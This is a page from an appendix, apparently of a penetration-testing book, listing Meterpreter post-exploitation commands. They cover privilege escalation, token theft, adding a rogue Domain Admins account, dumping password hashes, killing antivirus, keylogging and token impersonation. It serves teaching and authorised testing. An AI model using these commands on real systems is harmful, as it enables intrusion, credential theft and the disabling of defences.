282
Appendix B
Meterpreter Post Exploitation Commands
Elevate your permissions on Windows-based systems using Meterpreter:
meterpreter >
use priv
meterpreter >
getsystem
Steal a domain administrator token from a given process ID, add a
domain account, and then add it to the
Domain Admins
group:
meterpreter >
ps
meterpreter >
steal_token 1784
meterpreter >
shell
C:\Windows\system32>
net user metasploit p@55w0rd /ADD /DOMAIN
C:\Windows\system32>
net group "Domain Admins" metasploit /ADD /DOMAIN
Dump password hashes from the SAM database:
meterpreter >
use priv
meterpreter >
getsystem
meterpreter >
hashdump
NOTE
On Win2k8 you may need to migrate to a process that is running as SYSTEM if
getsystem
and
hashdump
throw exceptions.
Automigrate to a separate process:
meterpreter >
run migrate
Kill antivirus processes running on the target via the
killav
Meterpreter
script:
meterpreter >
run killav
Capture keystrokes on target machines from within a particular process:
meterpreter >
ps
meterpreter >
migrate 1436
meterpreter >
keyscan_start
meterpreter >
keyscan_dump
meterpreter >
keyscan_stop
Use Incognito to impersonate an administrator:
meterpreter >
use incognito
meterpreter >
list_tokens -u
meterpreter >
use priv
meterpreter >
getsystem